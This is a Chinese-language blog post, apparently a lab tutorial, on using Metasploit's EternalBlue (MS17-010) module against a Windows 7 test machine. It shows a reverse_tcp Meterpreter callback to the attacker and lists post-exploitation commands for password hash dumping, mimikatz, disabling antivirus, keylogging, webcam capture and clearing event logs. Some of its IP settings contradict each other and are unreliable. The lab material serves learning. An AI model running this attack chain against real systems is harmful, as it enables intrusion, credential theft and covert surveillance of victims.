<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="John Doe">





<title>msf | Hexo</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 7.3.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">cherryの技术文档</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">cherryの技术文档</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">msf</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">John Doe</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">April 11, 2025&nbsp;&nbsp;22:17:23</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <div class="post-content">
            <h1 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h1><p><strong>前提：对方的445端口必须开放,首先要保证是能够访问到目标机器的，那么我们先ping一下目标机器，看网络是否连通</strong></p>
<p><strong>如果无法ping的话，对方机器必须要关闭防火墙，或许有其他方法在对方开启防火墙的情况下访问到对方？目前采用关闭防火墙</strong></p>
<p><strong>使用工具：kali</strong></p>
<p>靶机：windows 7  ip：10.0.0.128</p>
<p>攻击机器：kali IP：10.0.0.139</p>
<p>Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称MSF。是一个免费、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#登录MSF</span></span><br><span class="line">┌──(root㉿kali)-[/home/cherry]</span><br><span class="line">└─# msfconsole  </span><br><span class="line">       =[ metasploit v6.4.54-dev                          ]  框架的版本号是 v6.4.54-dev</span><br><span class="line">+ -- --=[ 2499 exploits - 1289 auxiliary - 393 post       ]  2499 个漏洞利用模块。1289个辅助模块。393个后渗透模块</span><br><span class="line">+ -- --=[ 1607 payloads - 49 encoders - 13 nops           ]  1607 个有效载荷  49个编码器 13个NOP 生成器</span><br><span class="line">+ -- --=[ 9 evasion    9 个规避模</span><br></pre></td></tr></table></figure>

<h1 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h1><h2 id="1-基础使用"><a href="#1-基础使用" class="headerlink" title="1.基础使用"></a>1.基础使用</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">msfconsole										    #进入框架</span><br><span class="line">search  ms17_010                                    # 使用search命令查找相关漏洞</span><br><span class="line">use exploit/windows/smb/ms17_010_eternalblue        # 使用use进入模块</span><br><span class="line">info     										    #使用info查看模块信息</span><br><span class="line">set payload windows/x64/meterpreter/reverse_tcp    	#设置攻击载荷</span><br><span class="line">show options    									#查看模块需要配置的参数</span><br><span class="line">set  RHOST 10.0.0.128    					        #设置参数</span><br><span class="line">exploit / run     								    #攻击</span><br><span class="line">后渗透阶段											 #后渗透阶段</span><br></pre></td></tr></table></figure>

<p>不同的攻击用到的步骤也不一样，这不是一成不变的，需要灵活使用。 我们也可以将攻击代码写入configure.rc（只要是以.rc结尾的文件）配置文件中，然后使用命令msfconsole -r configure.rc进行自动攻击！</p>
<h2 id="2-MS17-010-永恒之蓝-："><a href="#2-MS17-010-永恒之蓝-：" class="headerlink" title="2.MS17_010(永恒之蓝)："></a>2.MS17_010(永恒之蓝)：</h2><p>我们现在模拟使用 MS17_010 漏洞攻击，这个漏洞就是去年危害全球的勒索病毒利用的永恒之蓝漏洞</p>
<h2 id="3-Meterpreter"><a href="#3-Meterpreter" class="headerlink" title="3.Meterpreter"></a>3.Meterpreter</h2><p>Meterpreter属于stage payload，在Metasploit Framework中，Meterpreter是一种后渗透工具，它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“<code>内存DLL注入</code>”理念实现的，它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件</p>
<p><strong>Meterpreter是如何工作的？</strong></p>
<p>首先目标先要执行初始的<code>溢出漏洞</code>会话连接，可能是 bind正向连接，或者反弹 reverse 连接。反射连接的时候<code>加载dll</code>链接文件，同时后台悄悄处理 dll 文件。其次Meterpreter核心代码初始化,通过 socket套接字建立一个TLS&#x2F;1.0加密隧道并发送GET请求给Metasploit服务端。Metasploit服务端收到这个GET请求后就配置相应客户端。最后，Meterpreter加载扩展，所有的扩展被加载都通过TLS&#x2F;1.0进行数据传输。</p>
<p><strong>Meterpreter的特点</strong></p>
<ul>
<li><code>Meterpreter</code>完全驻留在<code>内存</code>，没有写入到磁盘。</li>
<li><code>Meterpreter</code>注入的时候不会产生新的进程，并可以很容易的移植到其它正在运行的进程。</li>
<li>默认情况下， <code>Meterpreter</code>的通信是加密的，所以很安全。</li>
<li>扩展性，许多新的特征模块可以被加载。<br>我们在设置<code>payloads</code> 时，可以将<code>payloads</code>设置为：<code>windows/meterpreter/reverse_tcp</code> ，然后获得了<code>meterpreter&gt;</code>之后我们就可以干很多事了！具体做的事，在我们下面的后渗透阶段都有讲！</li>
</ul>
<p>　查找漏洞相关模块：</p>
<p>1、在kali命令行里面输入命令msfconsole，进入msf框架中：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfconsole  #输入这个命令主要是进入msf渗透框架中</span><br></pre></td></tr></table></figure>

<p>2、搜索MS17_010漏洞：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">search ms17_010  #利用search命令，搜索漏洞相关利用模块</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408151333706.png" alt="image-20250408151333706"></p>
<h2 id="4-Auxiliary辅助探测模块"><a href="#4-Auxiliary辅助探测模块" class="headerlink" title="4.Auxiliary辅助探测模块"></a>4.Auxiliary辅助探测模块</h2><p>利用Auxiliary辅助探测模块对漏洞进行探测：</p>
<p><code>Auxiliary辅助探测模块</code>：<br>该模块不会直接在攻击机和靶机之间建立访问，它们只负责执行扫描，嗅探，指纹识别等相关功能以辅助渗透测试。</p>
<p>1、使用smb_ms17_010漏洞探测模块对smb_ms17_010漏洞进行探测：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/smb/smb_ms17_010</span><br></pre></td></tr></table></figure>

<p>2、查看这个模块需要配置的信息：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408155017277.png" alt="image-20250408155017277"></p>
<p>3、设置要探测的远程目标：</p>
<p>注：RHOSTS 参数是要探测主机的ip或ip范围，我们探测一个ip范围内的主机是否存在漏洞</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> rhost 10.0.0.1-10.0.0.254</span><br></pre></td></tr></table></figure>

<p>4、对上面设置的ip范围内的主机进行攻击：<br>注：有+号的就是可能存在漏洞的主机，这里有2个主机存在漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408160119885.png" alt="image-20250408160119885"></p>
<h2 id="5-Exploit漏洞利用模块"><a href="#5-Exploit漏洞利用模块" class="headerlink" title="5.Exploit漏洞利用模块"></a>5.Exploit漏洞利用模块</h2><p>使用<code>Exploit漏洞利用模块</code>对漏洞进行利用：</p>
<p>1、选择漏洞攻击模块，对漏洞进行利用：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/smb/ms17_010_eternalblue</span><br></pre></td></tr></table></figure>

<p>2、查看这个漏洞的信息：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">info</span><br></pre></td></tr></table></figure>

<p>3、查看可攻击的系统平台，显示当前攻击模块针对哪些特定操作系统版本、语言版本的系统</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show targets  </span><br></pre></td></tr></table></figure>

<p>真好靶机就是Windows7</p>
<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408160928288.png" alt="image-20250408160928288"></p>
<h2 id="6-Payload攻击载荷模块："><a href="#6-Payload攻击载荷模块：" class="headerlink" title="6.Payload攻击载荷模块："></a>6.Payload攻击载荷模块：</h2><p>攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码，成功渗透目标后，用于在目标系统上运行任意命令。</p>
<p>1、查看攻击载荷：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show payloads      #该命令可以查看当前漏洞利用模块下可用的所有Payload</span><br></pre></td></tr></table></figure>

<p>2、设置攻击载荷：</p>
 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set payload windows/x64/meterpreter/reverse_tcp</span><br></pre></td></tr></table></figure>

<p>关于reverse_ tcp与bind _tcp</p>
<ul>
<li>采用reverse的方法一般较为安全， 因为<code>是目标机主动连接攻击机</code>，所以一般不会被防火墙发现。</li>
<li>而采用bind的方法，<code>攻击机主动连接目标机</code>( 即需要在目标机上打开端口)时很容易被安全软件和防火墙发现。</li>
</ul>
<p>3、查看模块需要配置的参数：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408161454008.png" alt="image-20250408161454008"></p>
<p>4、设置攻击载荷参数：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set RHOST 10.0.0.129   #设置RHOST，也就是要攻击主机的ip</span><br><span class="line">set LHOST 10.0.0.128   #设置LHOST，也就是我们主机的ip，用于接收从目标机弹回来的shell</span><br><span class="line">set lport 6666   #设置lport，也就是我们主机的端口，反弹shell到这个端口；如果我们这里不设置lport的话，默认是4444端口监听；</span><br></pre></td></tr></table></figure>

<h2 id="7-后渗透阶段："><a href="#7-后渗透阶段：" class="headerlink" title="7.后渗透阶段："></a>7.后渗透阶段：</h2><p>运行了<code>exploit命令</code>之后，我们开启了一个<code>reverse TCP监听器</code>来监听本地的<code>6666</code>端口，即我（攻击者）的本地主机地址（LHOST）和端口号（LPORT）。运行成功之后，我们将会看到命令提示符 <code>meterpreter &gt;</code> 出现，我们输入： shell 即可切换到目标主机的windows shell，要想从目标主机shell退出到 meterpreter ，我们只需输入：exit</p>
<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408161658071.png" alt="image-20250408161658071"></p>
<p>　Meterpreter的命令用法：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br></pre></td><td class="code"><pre><span class="line">Meterpreter &gt; ?</span><br><span class="line">==========================================</span><br><span class="line">核心命令：</span><br><span class="line">==========================================</span><br><span class="line">命令                           说明</span><br><span class="line">-------                       ------------</span><br><span class="line">?                             帮助菜单</span><br><span class="line">background                    把当前会话挂到后台运行</span><br><span class="line"><span class="built_in">bg</span>                            background命令的别名</span><br><span class="line">bgkill                        杀死后台meterpreter 脚本</span><br><span class="line">bglist                        列出正在运行的后台脚本</span><br><span class="line">bgrun                         执行一个meterpreter脚本作为后台线程</span><br><span class="line">channel                       显示信息或控制活动频道</span><br><span class="line">close                         关闭一个频道</span><br><span class="line">detach                        分离Meterpreter会话（用于 http/https）</span><br><span class="line">disable_unicode_encoding      禁用 unicode 字符串的编码</span><br><span class="line">enable_unicode_encoding       启用 unicode 字符串的编码</span><br><span class="line"><span class="built_in">exit</span>                          终止 Meterpreter 会话</span><br><span class="line">get_timeouts                  获取当前会话超时值</span><br><span class="line">guid                          获取会话 GUID</span><br><span class="line"><span class="built_in">help</span>                          帮助菜单</span><br><span class="line">info                          显示有关 Post 模块的信息</span><br><span class="line">irb                           在当前会话中打开一个交互式 Ruby shell</span><br><span class="line">load                          加载一个或多个 Meterpreter 扩展</span><br><span class="line">machine_id                    获取连接到会话的机器的 MSF ID</span><br><span class="line">migrate                       将服务器迁移到另一个进程</span><br><span class="line">pivot                         管理枢轴侦听器</span><br><span class="line">pry                           在当前会话上打开 Pry 调试器</span><br><span class="line">quit                          终止 Meterpreter 会话</span><br><span class="line"><span class="built_in">read</span>                          从通道读取数据</span><br><span class="line">resource                      运行存储在文件中的命令</span><br><span class="line">run                           执行一个 Meterpreter 脚本或 Post 模块</span><br><span class="line">secure                       （重新）协商会话上的 TLV 数据包加密</span><br><span class="line">sessions                      快速切换到另一个会话</span><br><span class="line">set_timeouts                  设置当前会话超时值</span><br><span class="line"><span class="built_in">sleep</span>                         强制 Meterpreter 安静，然后重新建立会话</span><br><span class="line">ssl_verify                    修改 SSL 证书验证设置</span><br><span class="line">transport                     管理运输机制</span><br><span class="line">use                           不推荐使用的load命令别名</span><br><span class="line">uuid                          获取当前会话的 UUID</span><br><span class="line">write                         将数据写入通道</span><br><span class="line"></span><br><span class="line">==========================================</span><br><span class="line">Stdapi：文件系统命令</span><br><span class="line">==========================================</span><br><span class="line"></span><br><span class="line">命令                           说明</span><br><span class="line">-------                       ------------</span><br><span class="line"><span class="built_in">cat</span>                           将文件内容读到屏幕上</span><br><span class="line"><span class="built_in">cd</span>                            切换目录</span><br><span class="line">checksum                      检索文件的校验和</span><br><span class="line"><span class="built_in">cp</span>                            将源复制到目标</span><br><span class="line">del                           删除指定文件</span><br><span class="line"><span class="built_in">dir</span>                           列出文件（<span class="built_in">ls</span> 的别名）</span><br><span class="line">download                      下载文件或目录</span><br><span class="line">edit                          编辑文件</span><br><span class="line">getlwd                        打印本地工作目录</span><br><span class="line">getwd                         打印工作目录</span><br><span class="line">lcd                           更改本地工作目录</span><br><span class="line">lls                           列出本地文件</span><br><span class="line">lpwd                          打印本地工作目录</span><br><span class="line"><span class="built_in">ls</span>                            列出文件</span><br><span class="line"><span class="built_in">mkdir</span>                         制作目录</span><br><span class="line"><span class="built_in">mv</span>                            将源移动到目标</span><br><span class="line"><span class="built_in">pwd</span>                           打印工作目录</span><br><span class="line"><span class="built_in">rm</span>                            删除指定文件</span><br><span class="line"><span class="built_in">rmdir</span>                         删除目录</span><br><span class="line">search                        搜索文件</span><br><span class="line">show_mount                    列出所有挂载点/逻辑驱动器</span><br><span class="line">upload                        上传文件或目录</span><br><span class="line"></span><br><span class="line">==========================================</span><br><span class="line">Stdapi：网络命令</span><br><span class="line">==========================================</span><br><span class="line">命令                           说明</span><br><span class="line">-------                       ------------</span><br><span class="line">arp                           显示主机 ARP 缓存</span><br><span class="line">getproxy                      显示当前代理配置</span><br><span class="line">ifconfig                      显示界面</span><br><span class="line">ipconfig                      显示接口</span><br><span class="line">netstat                       显示网络连接</span><br><span class="line">portfwd                       将本地端口转发到远程服务</span><br><span class="line">resolve                       解析目标上的一组主机名</span><br><span class="line">route                         查看和修改路由表</span><br><span class="line"></span><br><span class="line">==========================================</span><br><span class="line">Stdapi：系统命令</span><br><span class="line">==========================================</span><br><span class="line">命令                           说明</span><br><span class="line">-------                       ------------</span><br><span class="line">clearev                       清除事件日志</span><br><span class="line">drop_token                    放弃任何活动的模拟令牌。</span><br><span class="line">execute                       执行命令</span><br><span class="line">getenv                        获取一个或多个环境变量值</span><br><span class="line">getpid                        获取当前进程标识符</span><br><span class="line">getprivs                      尝试启用当前进程可用的所有权限</span><br><span class="line">getid                         获取服务器运行的用户的 SID</span><br><span class="line">getuid                        获取服务器运行的用户</span><br><span class="line"><span class="built_in">kill</span>                          终止进程</span><br><span class="line">localtime                     显示目标系统本地日期和时间</span><br><span class="line">pgrep                         按名称过滤进程</span><br><span class="line">pkill                         按名称终止进程</span><br><span class="line">ps                            列出正在运行的进程</span><br><span class="line">reboot                        重启远程计算机</span><br><span class="line">reg                           修改远程注册表并与之交互</span><br><span class="line">rev2self                      在远程机器上调用 RevertToSelf()</span><br><span class="line">shell                         放入系统命令 shell</span><br><span class="line">shutdown                      关闭远程计算机</span><br><span class="line">steal_token                   尝试从目标进程窃取模拟令牌</span><br><span class="line"><span class="built_in">suspend</span>                       暂停或恢复进程列表</span><br><span class="line">sysinfo                       获取有关远程系统的信息，例如 OS</span><br><span class="line"></span><br><span class="line">==========================================</span><br><span class="line">Stdapi：用户界面命令</span><br><span class="line">==========================================</span><br><span class="line">命令                           说明</span><br><span class="line">-------                       ------------</span><br><span class="line">enumdesktops                  列出所有可访问的桌面和窗口站</span><br><span class="line">getdesktop                    获取当前的meterpreter桌面</span><br><span class="line">idletime                      返回远程用户空闲的秒数</span><br><span class="line">keyboard_send                 发送击键</span><br><span class="line">keyevent                      发送按键事件</span><br><span class="line">keyscan_dump                  转储击键缓冲区</span><br><span class="line">keyscan_start                 开始捕获击键</span><br><span class="line">keyscan_stop                  停止捕获击键</span><br><span class="line">mouse                         发送鼠标事件</span><br><span class="line">screenshare                   实时观看远程用户桌面</span><br><span class="line">screenshot                    抓取交互式桌面的截图</span><br><span class="line">setdesktop                    更改meterpreters当前桌面</span><br><span class="line">uictl                         控制一些用户界面组件</span><br><span class="line"></span><br><span class="line">==========================================</span><br><span class="line">Stdapi：网络摄像头命令：</span><br><span class="line">==========================================</span><br><span class="line">命令                           说明</span><br><span class="line">-------                       ------------</span><br><span class="line">record_mic                    从默认麦克风录制音频 X 秒</span><br><span class="line">webcam_chat                   开始视频聊天</span><br><span class="line">webcam_list                   列出网络摄像头</span><br><span class="line">webcam_snap                   从指定的网络摄像头拍摄快照</span><br><span class="line">webcam_stream                 从指定的网络摄像头播放视频流</span><br><span class="line"></span><br><span class="line">==========================================</span><br><span class="line">Stdapi：音频输出命令：</span><br><span class="line">==========================================</span><br><span class="line">命令                           说明</span><br><span class="line">-------                       ------------</span><br><span class="line">play                          在目标系统上播放波形音频文件 (.wav)</span><br><span class="line"></span><br><span class="line">==========================================</span><br><span class="line">Priv：权限提升命令：</span><br><span class="line">==========================================</span><br><span class="line">命令                           说明</span><br><span class="line">-------                       ------------</span><br><span class="line">getsystem                     尝试将您的权限提升到本地系统的权限。</span><br><span class="line"></span><br><span class="line">==========================================</span><br><span class="line">Priv：密码数据库命令：</span><br><span class="line">==========================================</span><br><span class="line">命令                           说明</span><br><span class="line">-------                       ------------</span><br><span class="line">hashdump                      转储 SAM 数据库的内容</span><br><span class="line"></span><br><span class="line">==========================================</span><br><span class="line">Priv：Timestomp 命令：</span><br><span class="line">==========================================</span><br><span class="line">命令                           说明</span><br><span class="line">-------                       ------------</span><br><span class="line">timestomp                     操作文件 MACE 属性</span><br><span class="line"></span><br><span class="line">meterpreter &gt;</span><br></pre></td></tr></table></figure>

<p>常用的Meterpreter命令:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">sysinfo             									#查看目标主机系统信息</span><br><span class="line">run scraper         									#查看目标主机详细信息</span><br><span class="line">run hashdump        									#导出密码的哈希</span><br><span class="line">load kiwi           									#加载mimikatz</span><br><span class="line">ps                  									#查看目标主机进程信息</span><br><span class="line">pwd                		 								#查看目标当前目录(windows)</span><br><span class="line">getlwd              									#查看目标当前目录(Linux)</span><br><span class="line">search -f *.jsp -d e:\                					#搜索E盘中所有以.jsp为后缀的文件</span><br><span class="line">download  e:\test.txt  /root          					#将目标机的e:\test.txt文件下载到/root目录下</span><br><span class="line">upload    /root/test.txt d:\test      					#将/root/test.txt上传到目标机的 d:\test\ 目录下</span><br><span class="line">getpid             										#查看当前Meterpreter Shell的进程PID</span><br><span class="line">migrate 1384        									#将当前Meterpreter Shell的进程迁移到PID为1384的进程上</span><br><span class="line">idletime           		 								#查看主机运行时间</span><br><span class="line">getuid              									#查看获取的当前权限</span><br><span class="line">getsystem           									#提权,获得的当前用户是administrator才能成功</span><br><span class="line">run  killav        			 							#关闭杀毒软件</span><br><span class="line">screenshot          									#截图</span><br><span class="line">webcam_list         									#查看目标主机的摄像头</span><br><span class="line">webcam_snap         									#拍照</span><br><span class="line">webcam_stream       									#开视频</span><br><span class="line">execute 参数 -f 可执行文件   							    #执行可执行程序</span><br><span class="line">run getgui -u test1 -p Abc123456    					#创建test1用户，密码为Abc123456</span><br><span class="line">run getgui -e                							#开启远程桌面</span><br><span class="line">keyscan_start                							#开启键盘记录功能</span><br><span class="line">keyscan_dump                			 				#显示捕捉到的键盘记录信息</span><br><span class="line">keyscan_stop                 							#停止键盘记录功能</span><br><span class="line">uictl  disable  keyboard     							#禁止目标使用键盘</span><br><span class="line">uictl  enable   keyboard     							#允许目标使用键盘</span><br><span class="line">uictl  disable  mouse        							#禁止目标使用鼠标</span><br><span class="line">uictl  enable   mouse        							#允许目标使用鼠标</span><br><span class="line">load                        							#使用扩展库</span><br><span class="line">run				             							#使用扩展库</span><br><span 